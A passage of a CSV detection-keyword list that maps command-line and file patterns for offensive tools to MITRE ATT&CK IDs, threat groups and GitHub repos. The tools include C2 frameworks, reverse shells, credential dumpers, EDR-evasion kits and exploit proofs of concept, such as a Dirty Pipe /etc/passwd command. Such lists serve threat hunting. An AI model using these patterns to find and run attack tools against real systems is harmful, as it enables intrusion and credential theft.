Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*./Exfil.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*./exploit /etc/passwd 1 *cat /etc/passwd*","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","0","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" +"*./exploit /etc/passwd 1 ootz:*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" +"*./fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*./fee.py*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*./gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" +"*./getExploit*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" +"*./gimmeSH*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. 
your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" +"*./go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*./hashcat -*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*./hashview/*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*./Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*./havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - 
T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*./hoaxshell*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" +"*./hping *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*./hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*./inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*./Ivy -*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*./koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*./Lalin.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" +"*./litefuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" +"*./lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*./manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*./Microsploit*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . 
Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" +"*./monkey.sh*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*./mythic-cli *","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" +"*./Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*./nmap*","greyware_tool_keyword","nmap","A very common tool. Network host vuln and port detector.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","1","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"*./ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*./nysm/src/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*./pachine.py*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" +"*./Passdetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*./Pcredz *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" +"*./Phishing.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*./pwndrop *","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*./PyShell *","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","0","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*./RedGuard*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"*./redirector.py *","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - 
T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*./rpcrt.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" +"*./rsocx -*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*./scan4all *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*./ScareCrow *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*./ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*./ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*./seth.sh * *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*./snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*./SourcePoint *","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers 
designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*./sudomy*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*./t14m4t *","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" +"*./teamserver *","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"*./teamserver *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*./test/nmap*/*.nse*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*./update-beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*./Vegile*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" +"*./xhydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*./xrkRce *","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","0","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" +"*./zabbix.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z" +"*./zexp check -*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability 
cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","0","N/A","N/A","1","94","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" +"*.\dumpy.py*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*.\stager.ps1*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*.admin.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.adminusers.txt*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - 
